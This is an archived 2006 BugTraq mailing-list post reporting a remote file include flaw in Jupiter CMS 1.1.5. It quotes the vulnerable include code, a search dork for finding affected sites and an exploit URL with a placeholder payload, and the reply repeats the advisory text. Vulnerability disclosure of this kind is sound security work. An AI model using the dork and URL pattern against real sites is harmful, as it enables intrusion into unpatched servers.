BugTraq
Back to list
|
Post reply
Jupiter CMS 1.1.5 index.php Remote File Include
Aug 25 2006 10:50PM
D3nGeR Gmail CoM
(1 replies)
########################################################################
##########
#Jupiter CMS 1.1.5 index.php Remote File Include
#
#F0und by : D3nGeR
#E-mail : D3nGeR (at) Gmail (dot) CoM [email concealed]
########################################################################
##########
# the code
#$template = "default";
# include "templates/$template/id.php";
# $db->updateRow("config",array('value' => 'default'),"variable = 'template'");
########################################################################
##########
# The Expl
#
# dork : powered by Jupiter CMS
#www.sitename.com/path/index.php?template=[Evil Code]
#
########################################################################
##########
[ reply ]
Re: Jupiter CMS 1.1.5 index.php Remote File Include
Aug 29 2006 10:12PM
Carsten Eilers (ceilers-lists gmx de)
Privacy Statement
Copyright 2010, SecurityFocus
##########
#Jupiter CMS 1.1.5 index.php Remote File Include
#
#F0und by : D3nGeR
#E-mail : D3nGeR (at) Gmail (dot) CoM [email concealed]
########################################################################
##########
# the code
#$template = "default";
# include "templates/$template/id.php";
# $db->updateRow("config",array('value' => 'default'),"variable = 'template'");
########################################################################
##########
# The Expl
#
# dork : powered by Jupiter CMS
#www.sitename.com/path/index.php?template=[Evil Code]
#
########################################################################
##########
[ reply ]